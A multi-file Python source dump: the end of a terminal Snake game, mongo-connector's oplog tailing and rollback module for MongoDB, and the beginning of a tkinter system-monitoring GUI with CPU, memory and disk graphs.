# its queue
self._potential_growth = self.__snake_array.pop(0)
# Attempts to eat the food
def attempt_to_eat(self, food):
if(food.collide_with(self.get_head_pos())):
self.__snake_array.insert(0, self._potential_growth)
food.spawn_food(self.__snake_array)
# Checks if the snake should keep alive.
# Set __dead to True if not.
def check_survival(self, new_pos):
# Check if the head is outside upper and right boundaries
if(new_pos[0] < 0 or new_pos[1] < 0):
self.__dead = True
# Check if the head is outside bottom and left boundaries
if(new_pos[0] >= self.__game_width or new_pos[1] >= self.__game_height):
self.__dead = True
for i in range(1, len(self.get_snake_array()) - 1):
if(self.get_snake_array()[i] == new_pos):
self.__dead = True
# Changes the direction of the snake if the new direction is not
# incompatible with the old one. If incompatible, it does nothing.
def set_direction(self, direction):
invalid = False if len(direction) > 0 else True
invalid = invalid or self.__direction == self.DIRECTION_UP and direction == self.DIRECTION_DOWN
invalid = invalid or self.__direction == self.DIRECTION_DOWN and direction == self.DIRECTION_UP
invalid = invalid or self.__direction == self.DIRECTION_LEFT and direction == self.DIRECTION_RIGHT
invalid = invalid or self.__direction == self.DIRECTION_RIGHT and direction == self.DIRECTION_LEFT
if(not invalid):
self.__direction = direction
# Returns the size of the snake
def get_size(self):
return len(self.__snake_array)
# Configure whether the snake is dead or not
def is_dead(self):
return self.__dead
# Updates internal logic of the snake
def update(self, food):
if(not self.__dead):
if(self.__direction == self.DIRECTION_UP):
self.move_towards((self.get_head_pos()[0], self.get_head_pos()[1]-1))
elif(self.__direction == self.DIRECTION_DOWN):
self.move_towards((self.get_head_pos()[0], self.get_head_pos()[1]+1))
elif(self.__direction == self.DIRECTION_LEFT):
self.move_towards((self.get_head_pos()[0]-1, self.get_head_pos()[1]))
elif(self.__direction == self.DIRECTION_RIGHT):
self.move_towards((self.get_head_pos()[0]+1, self.get_head_pos()[1]))
self.attempt_to_eat(food)
# Thi class is used to instantied the food the snake is after
class Food:
FOOD_CHAR = "x"
def __init__(self, game_width, game_height):
self.__game_width = game_width
self.__game_height = game_height
# Spawn the food point in a position that is not
# in a the forbiden_points list
def spawn_food(self, forbiden_points):
x = random.randint(0, self.__game_width-1)
y = random.randint(0, self.__game_height-1)
# Make sure the food position is not in a forbiden
# position/point
while((x,y) in forbiden_points):
x = random.randint(0, self.__game_width-1)
y = random.randint(0, self.__game_height-1)
self.__pos = (x, y)
# Return true if point collides with food and
# false otherwise
def collide_with(self, point):
if(point == self.__pos):
return True
else:
return False
def add_itself(self, game_array):
game_array[self.__pos[1]][self.__pos[0]] = self.FOOD_CHAR
# This class represents the actual game
class SnakeGame():
def __init__(self, width, height):
self.__maze = MazeMap(width, height)
self.__snake = Snake(width, height)
self.__food = Food(width, height)
# Starts the game
def start(self):
self.__io = IOController()
atexit.register(self.__io.close) # Calls a clean up function at exit.
self.__food.spawn_food(self.__snake.get_snake_array())
while(True):
game_array = self.__maze.generate_maze()
self.__food.add_itself(game_array)
self.__snake.add_itself(game_array)
self.__io.print(game_array, self.__snake.get_size(), self.__snake.is_dead())
key = self.__io.get_last_key()
if(self.__snake.is_dead()):
if(key == IOController.KEY_Q):
self.__io.close()
break
self.__snake.set_direction(self.__read_direction(key))
self.__update()
time.sleep(.5)
def __update(self):
self.__snake.update(self.__food)
def __read_direction(self, key):
direction = ""
if(key == IOController.KEY_UP):
direction = Snake.DIRECTION_UP
elif(key == IOController.KEY_DOWN):
direction = Snake.DIRECTION_DOWN
elif(key == IOController.KEY_LEFT):
direction = Snake.DIRECTION_LEFT
elif(key == IOController.KEY_RIGHT):
direction = Snake.DIRECTION_RIGHT
return direction
def main():
game = SnakeGame(30, 10)
game.start()
main()
|
oplog_manager.py
|
# Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tails the oplog of a shard and returns entries
"""
import bson
import logging
try:
import Queue as queue
except ImportError:
import queue
import sys
import time
import threading
import pymongo
from pymongo import CursorType
from mongo_connector import errors, util
from mongo_connector.constants import DEFAULT_BATCH_SIZE
from mongo_connector.gridfs_file import GridFSFile
from mongo_connector.util import log_fatal_exceptions, retry_until_ok
LOG = logging.getLogger(__name__)
class ReplicationLagLogger(threading.Thread):
"""Thread that periodically logs the current replication lag.
"""
def __init__(self, opman, interval):
super(ReplicationLagLogger, self).__init__()
self.opman = opman
self.interval = interval
self.daemon = True
def log_replication_lag(self):
checkpoint = self.opman.checkpoint
if checkpoint is None:
return
newest_write = retry_until_ok(self.opman.get_last_oplog_timestamp)
if newest_write < checkpoint:
# OplogThread will perform a rollback, don't log anything
return
lag_secs = newest_write.time - checkpoint.time
if lag_secs > 0:
LOG.info(
"OplogThread for replica set '%s' is %s seconds behind " "the oplog.",
self.opman.replset_name,
lag_secs,
)
else:
lag_inc = newest_write.inc - checkpoint.inc
if lag_inc > 0:
LOG.info(
"OplogThread for replica set '%s' is %s entries "
"behind the oplog.",
self.opman.replset_name,
lag_inc,
)
else:
LOG.info(
"OplogThread for replica set '%s' is up to date " "with the oplog.",
self.opman.replset_name,
)
def run(self):
while self.opman.is_alive():
self.log_replication_lag()
time.sleep(self.interval)
class OplogThread(threading.Thread):
"""Thread that tails an oplog.
Calls the appropriate method on DocManagers for each relevant oplog entry.
"""
def __init__(
self,
primary_client,
doc_managers,
oplog_progress_dict,
namespace_config,
mongos_client=None,
**kwargs
):
super(OplogThread, self).__init__()
self.batch_size = kwargs.get("batch_size", DEFAULT_BATCH_SIZE)
# The connection to the primary for this replicaSet.
self.primary_client = primary_client
# The connection to the mongos, if there is one.
self.mongos_client = mongos_client
# Are we allowed to perform a collection dump?
self.collection_dump = kwargs.get("collection_dump", True)
# The document manager for each target system.
# These are the same for all threads.
self.doc_managers = doc_managers
# Boolean describing whether or not the thread is running.
self.running = True
# Stores the timestamp of the last oplog entry read.
self.checkpoint = None
# A dictionary that stores OplogThread/timestamp pairs.
# Represents the last checkpoint for a OplogThread.
self.oplog_progress = oplog_progress_dict
# The namespace configuration
self.namespace_config = namespace_config
# Whether the collection dump gracefully handles exceptions
self.continue_on_error = kwargs.get("continue_on_error", False)
LOG.info("OplogThread: Initializing oplog thread")
self.oplog = self.primary_client.local.oplog.rs
self.replset_name = self.primary_client.admin.command("ismaster")["setName"]
if not self.oplog.find_one():
err_msg = "OplogThread: No oplog for thread:"
LOG.warning("%s %s" % (err_msg, self.primary_client))
def _should_skip_entry(self, entry):
"""Determine if this oplog entry should be skipped.
This has the possible side effect of modifying the entry's namespace
and filtering fields from updates and inserts.
"""
# Don't replicate entries resulting from chunk moves
if entry.get("fromMigrate"):
return True, False
# Ignore no-ops
if entry["op"] == "n":
return True, False
ns = entry["ns"]
if "." not in ns:
return True, False
coll = ns.split(".", 1)[1]
# Ignore system collections
if coll.startswith("system."):
return True, False
# Ignore GridFS chunks
if coll.endswith(".chunks"):
return True, False
is_gridfs_file = False
if coll.endswith(".files"):
ns = ns[: -len(".files")]
if self.namespace_config.gridfs_namespace(ns):
is_gridfs_file = True
else:
return True, False
# Commands should not be ignored, filtered, or renamed. Renaming is
# handled by the DocManagers via the CommandHelper class.
if coll == "$cmd":
return False, False
# Rename or filter out namespaces that are ignored keeping
# included gridfs namespaces.
namespace = self.namespace_config.lookup(ns)
if namespace is None:
LOG.debug(
"OplogThread: Skipping oplog entry: "
"'%s' is not in the namespace configuration." % (ns,)
)
return True, False
if "Groups" in coll:
LOG.error("DEBUGG:: Groups op: %s, _id: %s" % (entry["op"],entry["o"]["_id"]))
# Update the namespace.
entry["ns"] = namespace.dest_name
# Take fields out of the oplog entry that shouldn't be replicated.
# This may nullify the document if there's nothing to do.
if not self.filter_oplog_entry(
entry,
include_fields=namespace.include_fields,
exclude_fields=namespace.exclude_fields,
):
return True, False
return False, is_gridfs_file
@log_fatal_exceptions
def run(self):
"""Start the oplog worker.
"""
ReplicationLagLogger(self, 30).start()
LOG.debug("OplogThread: Run thread started")
while self.running is True:
LOG.debug("OplogThread: Getting cursor")
cursor, cursor_empty = retry_until_ok(self.init_cursor)
# we've fallen too far behind
if cursor is None and self.checkpoint is not None:
err_msg = "OplogThread: Last entry no longer in oplog"
effect = "cannot recover!"
LOG.error("%s %s %s" % (err_msg, effect, self.oplog))
self.running = False
continue
if cursor_empty:
LOG.debug(
"OplogThread: Last entry is the one we "
"already processed. Up to date. Sleeping."
)
time.sleep(1)
continue
last_ts = None
remove_inc = 0
upsert_inc = 0
update_inc = 0
try:
LOG.debug("OplogThread: about to process new oplog entries")
while cursor.alive and self.running:
LOG.debug(
"OplogThread: Cursor is still"
" alive and thread is still running."
)
for n, entry in enumerate(cursor):
# Break out if this thread should stop
if not self.running:
break
LOG.debug(
"OplogThread: Iterating through cursor,"
" document number in this cursor is %d" % n
)
skip, is_gridfs_file = self._should_skip_entry(entry)
if skip:
# update the last_ts on skipped entries to ensure
# our checkpoint does not fall off the oplog. This
# also prevents reprocessing skipped entries.
last_ts = entry["ts"]
continue
# Sync the current oplog operation
operation = entry["op"]
ns = entry["ns"]
timestamp = util.bson_ts_to_long(entry["ts"])
for docman in self.doc_managers:
try:
LOG.debug(
"OplogThread: Operation for this "
"entry is %s" % str(operation)
)
# Remove
if operation == "d":
docman.remove(entry["o"]["_id"], ns, timestamp)
remove_inc += 1
# Insert
elif operation == "i": # Insert
# Retrieve inserted document from
# 'o' field in oplog record
doc = entry.get("o")
# Extract timestamp and namespace
if is_gridfs_file:
db, coll = ns.split(".", 1)
gridfile = GridFSFile(
self.primary_client[db][coll], doc
)
docman.insert_file(gridfile, ns, timestamp)
else:
docman.upsert(doc, ns, timestamp)
upsert_inc += 1
# Update
elif operation == "u":
docman.update(
entry["o2"]["_id"], entry["o"], ns, timestamp
)
update_inc += 1
# Command
elif operation == "c":
# use unmapped namespace
doc = entry.get("o")
docman.handle_command(doc, entry["ns"], timestamp)
except errors.OperationFailed:
LOG.exception(
"Unable to process oplog document %r" % entry
)
except errors.ConnectionFailed:
LOG.exception(
"Connection failed while processing oplog "
"document %r" % entry
)
if (remove_inc + upsert_inc + update_inc) % 1000 == 0:
LOG.debug(
"OplogThread: Documents removed: %d, "
"inserted: %d, updated: %d so far"
% (remove_inc, upsert_inc, update_inc)
)
LOG.debug("OplogThread: Doc is processed.")
last_ts = entry["ts"]
# update timestamp per batch size
# n % -1 (default for self.batch_size) == 0 for all n
if n % self.batch_size == 1:
self.update_checkpoint(last_ts)
last_ts = None
# update timestamp after running through oplog
if last_ts is not None:
LOG.debug(
"OplogThread: updating checkpoint after "
"processing new oplog entries"
)
self.update_checkpoint(last_ts)
except (
pymongo.errors.AutoReconnect,
pymongo.errors.OperationFailure,
pymongo.errors.ConfigurationError,
):
LOG.exception(
"Cursor closed due to an exception. " "Will attempt to reconnect."
)
# update timestamp before attempting to reconnect to MongoDB,
# after being join()'ed, or if the cursor closes
if last_ts is not None:
LOG.debug(
"OplogThread: updating checkpoint after an "
"Exception, cursor closing, or join() on this"
"thread."
)
self.update_checkpoint(last_ts)
LOG.debug(
"OplogThread: Sleeping. Documents removed: %d, "
"upserted: %d, updated: %d" % (remove_inc, upsert_inc, update_inc)
)
time.sleep(2)
def join(self):
"""Stop this thread from managing the oplog.
"""
LOG.debug("OplogThread: exiting due to join call.")
self.running = False
threading.Thread.join(self)
@classmethod
def _find_field(cls, field, doc):
"""Find the field in the document which matches the given field.
The field may be in dot notation, eg "a.b.c". Returns a list with
a single tuple (path, field_value) or the empty list if the field
is not present.
"""
path = field.split(".")
try:
for key in path:
doc = doc[key]
return [(path, doc)]
except (KeyError, TypeError):
return []
@classmethod
def _find_update_fields(cls, field, doc):
"""Find the fields in the update document which match the given field.
Both the field and the top level keys in the doc may be in dot
notation, eg "a.b.c". Returns a list of tuples (path, field_value) or
the empty list if the field is not present.
"""
def find_partial_matches():
for key in doc:
if len(key) > len(field):
# Handle case where field is a prefix of key, eg field is
# 'a' and key is 'a.b'.
if key.startswith(field) and key[len(field)] == ".":
yield [key], doc[key]
# Continue searching, there may be multiple matches.
# For example, field 'a' should match 'a.b' and 'a.c'.
elif len(key) < len(field):
# Handle case where key is a prefix of field, eg field is
# 'a.b' and key is 'a'.
if field.startswith(key) and field[len(key)] == ".":
# Search for the remaining part of the field
matched = cls._find_field(field[len(key) + 1 :], doc[key])
if matched:
# Add the top level key to the path.
match = matched[0]
match[0].insert(0, key)
yield match
# Stop searching, it's not possible for any other
# keys in the update doc to match this field.
return
try:
return [([field], doc[field])]
except KeyError:
# Field does not exactly match any key in the update doc.
return list(find_partial_matches())
def _pop_excluded_fields(self, doc, exclude_fields, update=False):
# Remove all the fields that were passed in exclude_fields.
find_fields = self._find_update_fields if update else self._find_field
for field in exclude_fields:
for path, _ in find_fields(field, doc):
# Delete each matching field in the original document.
temp_doc = doc
for p in path[:-1]:
temp_doc = temp_doc[p]
temp_doc.pop(path[-1])
return doc # Need this to be similar to copy_included_fields.
def _copy_included_fields(self, doc, include_fields, update=False):
new_doc = {}
find_fields = self._find_update_fields if update else self._find_field
for field in include_fields:
for path, value in find_fields(field, doc):
# Copy each matching field in the original document.
temp_doc = new_doc
for p in path[:-1]:
temp_doc = temp_doc.setdefault(p, {})
temp_doc[path[-1]] = value
return new_doc
def filter_oplog_entry(self, entry, include_fields=None, exclude_fields=None):
"""Remove fields from an oplog entry that should not be replicated.
NOTE: this does not support array indexing, for example 'a.b.2'"""
if not include_fields and not exclude_fields:
return entry
elif include_fields:
filter_fields = self._copy_included_fields
else:
filter_fields = self._pop_excluded_fields
fields = include_fields or exclude_fields
entry_o = entry["o"]
# Version 3.6 of mongodb includes a $v,
# see https://jira.mongodb.org/browse/SERVER-32240
if "$v" in entry_o:
entry_o.pop("$v")
# 'i' indicates an insert. 'o' field is the doc to be inserted.
if entry["op"] == "i":
entry["o"] = filter_fields(entry_o, fields)
# 'u' indicates an update. The 'o' field describes an update spec
# if '$set' or '$unset' are present.
elif entry["op"] == "u" and ("$set" in entry_o or "$unset" in entry_o):
if "$set" in entry_o:
entry["o"]["$set"] = filter_fields(entry_o["$set"], fields, update=True)
if "$unset" in entry_o:
entry["o"]["$unset"] = filter_fields(
entry_o["$unset"], fields, update=True
)
# not allowed to have empty $set/$unset, so remove if empty
if "$set" in entry_o and not entry_o["$set"]:
entry_o.pop("$set")
if "$unset" in entry_o and not entry_o["$unset"]:
entry_o.pop("$unset")
if not entry_o:
return None
# 'u' indicates an update. The 'o' field is the replacement document
# if no '$set' or '$unset' are present.
elif entry["op"] == "u":
entry["o"] = filter_fields(entry_o, fields)
return entry
def get_oplog_cursor(self, timestamp=None):
"""Get a cursor to the oplog after the given timestamp, excluding
no-op entries.
If no timestamp is specified, returns a cursor to the entire oplog.
"""
query = {"op": {"$ne": "n"}}
if timestamp is None:
cursor = self.oplog.find(query, cursor_type=CursorType.TAILABLE_AWAIT)
else:
query["ts"] = {"$gte": timestamp}
cursor = self.oplog.find(
query, cursor_type=CursorType.TAILABLE_AWAIT, oplog_replay=True
)
return cursor
def get_collection(self, namespace):
"""Get a pymongo collection from a namespace."""
database, coll = namespace.split(".", 1)
return self.primary_client[database][coll]
def dump_collection(self):
"""Dumps collection into the target system.
This method is called when we're initializing the cursor and have no
configs i.e. when we're starting for the first time.
"""
timestamp = retry_until_ok(self.get_last_oplog_timestamp)
if timestamp is None:
return None
long_ts = util.bson_ts_to_long(timestamp)
# Flag if this oplog thread was cancelled during the collection dump.
# Use a list to workaround python scoping.
dump_cancelled = [False]
def get_all_ns():
ns_set = []
gridfs_ns_set = []
db_list = self.namespace_config.get_included_databases()
if not db_list:
# Only use listDatabases when the configured databases are not
# explicit.
db_list = retry_until_ok(self.primary_client.database_names)
for database in db_list:
if database == "config" or database == "local":
continue
coll_list = retry_until_ok(
self.primary_client[database].collection_names
)
for coll in coll_list:
# ignore system collections
if coll.startswith("system."):
continue
# ignore gridfs chunks collections
if coll.endswith(".chunks"):
continue
if coll.endswith(".files"):
namespace = "%s.%s" % (database, coll)
namespace = namespace[: -len(".files")]
if self.namespace_config.gridfs_namespace(namespace):
gridfs_ns_set.append(namespace)
else:
namespace = "%s.%s" % (database, coll)
if self.namespace_config.map_namespace(namespace):
ns_set.append(namespace)
return ns_set, gridfs_ns_set
dump_set, gridfs_dump_set = get_all_ns()
LOG.debug("OplogThread: Dumping set of collections %s " % dump_set)
def docs_to_dump(from_coll):
last_id = None
attempts = 0
projection = self.namespace_config.projection(from_coll.full_name)
# Loop to handle possible AutoReconnect
while attempts < 60:
if last_id is None:
cursor = retry_until_ok(
from_coll.find,
projection=projection,
sort=[("_id", pymongo.ASCENDING)],
)
else:
cursor = retry_until_ok(
from_coll.find,
{"_id": {"$gt": last_id}},
projection=projection,
sort=[("_id", pymongo.ASCENDING)],
)
try:
for doc in cursor:
if not self.running:
# Thread was joined while performing the
# collection dump.
dump_cancelled[0] = True
raise StopIteration
last_id = doc["_id"]
yield doc
break
except (pymongo.errors.AutoReconnect, pymongo.errors.OperationFailure):
attempts += 1
time.sleep(1)
def upsert_each(dm):
num_failed = 0
for namespace in dump_set:
from_coll = self.get_collection(namespace)
mapped_ns = self.namespace_config.map_namespace(namespace)
total_docs = retry_until_ok(from_coll.count)
num = None
for num, doc in enumerate(docs_to_dump(from_coll)):
try:
dm.upsert(doc, mapped_ns, long_ts)
except Exception:
if self.continue_on_error:
LOG.exception("Could not upsert document: %r" % doc)
num_failed += 1
else:
raise
if num % 10000 == 0:
LOG.info(
"Upserted %d out of approximately %d docs "
"from collection '%s'",
num + 1,
total_docs,
namespace,
)
if num is not None:
LOG.info(
"Upserted %d out of approximately %d docs from "
"collection '%s'",
num + 1,
total_docs,
namespace,
)
if num_failed > 0:
LOG.error("Failed to upsert %d docs" % num_failed)
def upsert_all(dm):
try:
for namespace in dump_set:
from_coll = self.get_collection(namespace)
total_docs = retry_until_ok(from_coll.count)
mapped_ns = self.namespace_config.map_namespace(namespace)
LOG.info(
"Bulk upserting approximately %d docs from " "collection '%s'",
total_docs,
namespace,
)
dm.bulk_upsert(docs_to_dump(from_coll), mapped_ns, long_ts)
except Exception:
if self.continue_on_error:
LOG.exception(
"OplogThread: caught exception"
" during bulk upsert, re-upserting"
" documents serially"
)
upsert_each(dm)
else:
raise
def do_dump(dm, error_queue):
try:
LOG.debug(
"OplogThread: Using bulk upsert function for " "collection dump"
)
upsert_all(dm)
if gridfs_dump_set:
LOG.info(
"OplogThread: dumping GridFS collections: %s", gridfs_dump_set
)
# Dump GridFS files
for gridfs_ns in gridfs_dump_set:
mongo_coll = self.get_collection(gridfs_ns)
from_coll = self.get_collection(gridfs_ns + ".files")
dest_ns = self.namespace_config.map_namespace(gridfs_ns)
for doc in docs_to_dump(from_coll):
gridfile = GridFSFile(mongo_coll, doc)
dm.insert_file(gridfile, dest_ns, long_ts)
except Exception:
# Likely exceptions:
# pymongo.errors.OperationFailure,
# mongo_connector.errors.ConnectionFailed
# mongo_connector.errors.OperationFailed
error_queue.put(sys.exc_info())
# Extra threads (if any) that assist with collection dumps
dumping_threads = []
# Did the dump succeed for all target systems?
dump_success = True
# Holds any exceptions we can't recover from
errors = queue.Queue()
if len(self.doc_managers) == 1:
do_dump(self.doc_managers[0], errors)
else:
# Slight performance gain breaking dump into separate
# threads if > 1 replication target
for dm in self.doc_managers:
t = threading.Thread(target=do_dump, args=(dm, errors))
dumping_threads.append(t)
t.start()
# cleanup
for t in dumping_threads:
t.join()
# Print caught exceptions
try:
while True:
LOG.critical(
"Exception during collection dump", exc_info=errors.get_nowait()
)
dump_success = False
except queue.Empty:
pass
if not dump_success:
err_msg = "OplogThread: Failed during dump collection"
effect = "cannot recover!"
LOG.error("%s %s %s" % (err_msg, effect, self.oplog))
self.running = False
return None
if dump_cancelled[0]:
LOG.warning(
"Initial collection dump was interrupted. "
"Will re-run the collection dump on next startup."
)
return None
return timestamp
def _get_oplog_timestamp(self, newest_entry):
"""Return the timestamp of the latest or earliest entry in the oplog.
"""
sort_order = pymongo.DESCENDING if newest_entry else pymongo.ASCENDING
curr = (
self.oplog.find({"op": {"$ne": "n"}}).sort("$natural", sort_order).limit(-1)
)
try:
ts = next(curr)["ts"]
except StopIteration:
LOG.debug("OplogThread: oplog is empty.")
return None
LOG.debug(
"OplogThread: %s oplog entry has timestamp %s."
% ("Newest" if newest_entry else "Oldest", ts)
)
return ts
def get_oldest_oplog_timestamp(self):
"""Return the timestamp of the oldest entry in the oplog.
"""
return self._get_oplog_timestamp(False)
def get_last_oplog_timestamp(self):
"""Return the timestamp of the newest entry in the oplog.
"""
return self._get_oplog_timestamp(True)
def _cursor_empty(self, cursor):
try:
# Tailable cursors can not have singleBatch=True in MongoDB > 3.3
next(cursor.clone().remove_option(CursorType.TAILABLE_AWAIT).limit(-1))
return False
except StopIteration:
return True
def init_cursor(self):
"""Position the cursor appropriately.
The cursor is set to either the beginning of the oplog, or
wherever it was last left off.
Returns the cursor and True if the cursor is empty.
"""
timestamp = self.read_last_checkpoint()
if timestamp is None:
if self.collection_dump:
# dump collection and update checkpoint
timestamp = self.dump_collection()
self.update_checkpoint(timestamp)
if timestamp is None:
return None, True
else:
# Collection dump disabled:
# Return cursor to beginning of oplog but do not set the
# checkpoint. The checkpoint will be set after an operation
# has been applied.
cursor = self.get_oplog_cursor()
return cursor, self._cursor_empty(cursor)
cursor = self.get_oplog_cursor(timestamp)
cursor_empty = self._cursor_empty(cursor)
if cursor_empty:
# rollback, update checkpoint, and retry
LOG.debug("OplogThread: Initiating rollback from " "get_oplog_cursor")
self.update_checkpoint(self.rollback())
return self.init_cursor()
first_oplog_entry = next(cursor)
oldest_ts_long = util.bson_ts_to_long(self.get_oldest_oplog_timestamp())
checkpoint_ts_long = util.bson_ts_to_long(timestamp)
if checkpoint_ts_long < oldest_ts_long:
# We've fallen behind, the checkpoint has fallen off the oplog
return None, True
cursor_ts_long = util.bson_ts_to_long(first_oplog_entry["ts"])
if cursor_ts_long > checkpoint_ts_long:
# The checkpoint is not present in this oplog and the oplog
# did not rollover. This means that we connected to a new
# primary which did not replicate the checkpoint and which has
# new changes in its oplog for us to process.
# rollback, update checkpoint, and retry
LOG.debug(
"OplogThread: Initiating rollback from "
"get_oplog_cursor: new oplog entries found but "
"checkpoint is not present"
)
self.update_checkpoint(self.rollback())
return self.init_cursor()
# first entry has been consumed
return cursor, cursor_empty
def update_checkpoint(self, checkpoint):
"""Store the current checkpoint in the oplog progress dictionary.
"""
if checkpoint is not None and checkpoint != self.checkpoint:
self.checkpoint = checkpoint
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
# If we have the repr of our oplog collection
# in the dictionary, remove it and replace it
# with our replica set name.
# This allows an easy upgrade path from mongo-connector 2.3.
# For an explanation of the format change, see the comment in
# read_last_checkpoint.
oplog_dict.pop(str(self.oplog), None)
oplog_dict[self.replset_name] = checkpoint
LOG.debug("OplogThread: oplog checkpoint updated to %s", checkpoint)
else:
LOG.debug("OplogThread: no checkpoint to update.")
def read_last_checkpoint(self):
"""Read the last checkpoint from the oplog progress dictionary.
"""
# In versions of mongo-connector 2.3 and before,
# we used the repr of the
# oplog collection as keys in the oplog_progress dictionary.
# In versions thereafter, we use the replica set name. For backwards
# compatibility, we check for both.
oplog_str = str(self.oplog)
ret_val = None
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
try:
# New format.
ret_val = oplog_dict[self.replset_name]
except KeyError:
try:
# Old format.
ret_val = oplog_dict[oplog_str]
except KeyError:
pass
LOG.debug("OplogThread: reading last checkpoint as %s " % str(ret_val))
self.checkpoint = ret_val
return ret_val
def rollback(self):
"""Rollback target system to consistent state.
The strategy is to find the latest timestamp in the target system and
the largest timestamp in the oplog less than the latest target system
timestamp. This defines the rollback window and we just roll these
back until the oplog and target system are in consistent states.
"""
# Find the most recently inserted document in each target system
LOG.debug(
"OplogThread: Initiating rollback sequence to bring "
"system into a consistent state."
)
last_docs = []
for dm in self.doc_managers:
dm.commit()
last_docs.append(dm.get_last_doc())
# Of these documents, which is the most recent?
last_inserted_doc = max(
last_docs, key=lambda x: x["_ts"] if x else float("-inf")
)
# Nothing has been replicated. No need to rollback target systems
if last_inserted_doc is None:
return None
# Find the oplog entry that touched the most recent document.
# We'll use this to figure where to pick up the oplog later.
target_ts = util.long_to_bson_ts(last_inserted_doc["_ts"])
last_oplog_entry = util.retry_until_ok(
self.oplog.find_one,
{"ts": {"$lte": target_ts}, "op": {"$ne": "n"}},
sort=[("$natural", pymongo.DESCENDING)],
)
LOG.debug("OplogThread: last oplog entry is %s" % str(last_oplog_entry))
# The oplog entry for the most recent document doesn't exist anymore.
# If we've fallen behind in the oplog, this will be caught later
if last_oplog_entry is None:
return None
# rollback_cutoff_ts happened *before* the rollback
rollback_cutoff_ts = last_oplog_entry["ts"]
start_ts = util.bson_ts_to_long(rollback_cutoff_ts)
# timestamp of the most recent document on any target system
end_ts = last_inserted_doc["_ts"]
for dm in self.doc_managers:
rollback_set = {} # this is a dictionary of ns:list of docs
# group potentially conflicted documents by namespace
for doc in dm.search(start_ts, end_ts):
if doc["ns"] in rollback_set:
rollback_set[doc["ns"]].append(doc)
else:
rollback_set[doc["ns"]] = [doc]
# retrieve these documents from MongoDB, either updating
# or removing them in each target system
for namespace, doc_list in rollback_set.items():
# Get the original namespace
original_namespace = self.namespace_config.unmap_namespace(namespace)
if not original_namespace:
original_namespace = namespace
database, coll = original_namespace.split(".", 1)
obj_id = bson.objectid.ObjectId
bson_obj_id_list = [obj_id(doc["_id"]) for doc in doc_list]
# Use connection to whole cluster if in sharded environment.
client = self.mongos_client or self.primary_client
to_update = util.retry_until_ok(
client[database][coll].find,
{"_id": {"$in": bson_obj_id_list}},
projection=self.namespace_config.projection(original_namespace),
)
# Doc list are docs in target system, to_update are
# Docs in mongo
doc_hash = {} # Hash by _id
for doc in doc_list:
doc_hash[bson.objectid.ObjectId(doc["_id"])] = doc
to_index = []
def collect_existing_docs():
for doc in to_update:
if doc["_id"] in doc_hash:
del doc_hash[doc["_id"]]
to_index.append(doc)
retry_until_ok(collect_existing_docs)
# Delete the inconsistent documents
LOG.debug("OplogThread: Rollback, removing inconsistent " "docs.")
remov_inc = 0
for document_id in doc_hash:
try:
dm.remove(
document_id,
namespace,
util.bson_ts_to_long(rollback_cutoff_ts),
)
remov_inc += 1
LOG.debug("OplogThread: Rollback, removed %r " % doc)
except errors.OperationFailed:
LOG.warning(
"Could not delete document during rollback: %r "
"This can happen if this document was already "
"removed by another rollback happening at the "
"same time." % doc
)
LOG.debug("OplogThread: Rollback, removed %d docs." % remov_inc)
# Insert the ones from mongo
LOG.debug("OplogThread: Rollback, inserting documents " "from mongo.")
insert_inc = 0
fail_insert_inc = 0
for doc in to_index:
try:
insert_inc += 1
dm.upsert(
doc, namespace, util.bson_ts_to_long(rollback_cutoff_ts)
)
except errors.OperationFailed:
fail_insert_inc += 1
LOG.exception(
"OplogThread: Rollback, Unable to " "insert %r" % doc
)
LOG.debug(
"OplogThread: Rollback, Successfully inserted %d "
" documents and failed to insert %d"
" documents. Returning a rollback cutoff time of %s "
% (insert_inc, fail_insert_inc, str(rollback_cutoff_ts))
)
return rollback_cutoff_ts
|
main.py
|
# use tkinter to create gui with 3 tabs - current, historical and read csv
# import libraries
import tkinter as tk
from tkinter import ttk
from tkinter import filedialog
import csv
import matplotlib.pyplot as plt
import numpy as np
from utils import data_util, database_util, graph_util
import threading
import time
import platform
import cache
from tkcalendar import Calendar
from datetime import datetime, timedelta
import csv
from sys import platform
if platform == "win32":
import warnings
warnings.filterwarnings(
"ignore", message="tight_layout : falling back to Agg renderer")
def graph():
# generate random data
a = np.random.normal(0, 1, 100)
plt.hist(a, bins=20, color='#3B3C6E')
plt.show()
def setup_window():
# make button on tab1
# make window
if platform == "win32":
import ctypes
ctypes.windll.shcore.SetProcessDpiAwareness(1)
window = tk.Tk()
window.title("Your Computer At A Glance (YCAAG)")
if platform == "win32":
window.geometry("300x650")
else:
window.geometry("400x750")
window.resizable(0, 0)
photo = tk.PhotoImage(file="images/icon.png")
window.iconphoto(False, photo)
s = ttk.Style(window)
if platform != "win32":
s.theme_use('clam')
s.layout("Tab",
[('Notebook.tab', {'sticky': 'nswe', 'children':
[('Notebook.padding', {'side': 'top', 'sticky': 'nswe', 'children':
# [('Notebook.focus', {'side': 'top', 'sticky': 'nswe', 'children':
[('Notebook.label', {
'side': 'top', 'sticky': ''})],
# })],
})],
})]
)
s.configure("TNotebook", tabposition='n')
# make tabs
tab_control = ttk.Notebook(window)
tab1 = ttk.Frame(tab_control)
tab2 = ttk.Frame(tab_control)
tab3 = ttk.Frame(tab_control)
tab4 = ttk.Frame(tab_control)
tab_control.add(tab1, text="Current")
tab_control.add(tab2, text="Historical")
tab_control.add(tab3, text="Export CSV")
tab_control.add(tab4, text="Import CSV")
tab_control.pack(expand=1, fill="both")
cpu_graph = graph_util.AnimatedBaseGraph(tab1, 60, "CPU")
mem_graph = graph_util.AnimatedBaseGraph(tab1, 60, "MEMORY")
disk_graph = graph_util.AnimatedBaseGraph(tab1, 60, "DISK")
# frame1 = ttk.Frame(tab1)
# frame2 = ttk.Frame(tab1)
# frame3 = ttk.Frame(tab1)
# new_data = cache.get_cache()[-1]
cpu_graph.pack(fill="both", expand=1)
# T = tk.Label(tab1, text = "MEMORY")
# T.pack()
mem_graph.pack(fill="both", expand=1)
# T = tk.Label(tab1, text = "DISK")
# T.pack()
disk_graph.pack(fill="both", expand=1)
######
'''TAB 2'''
######
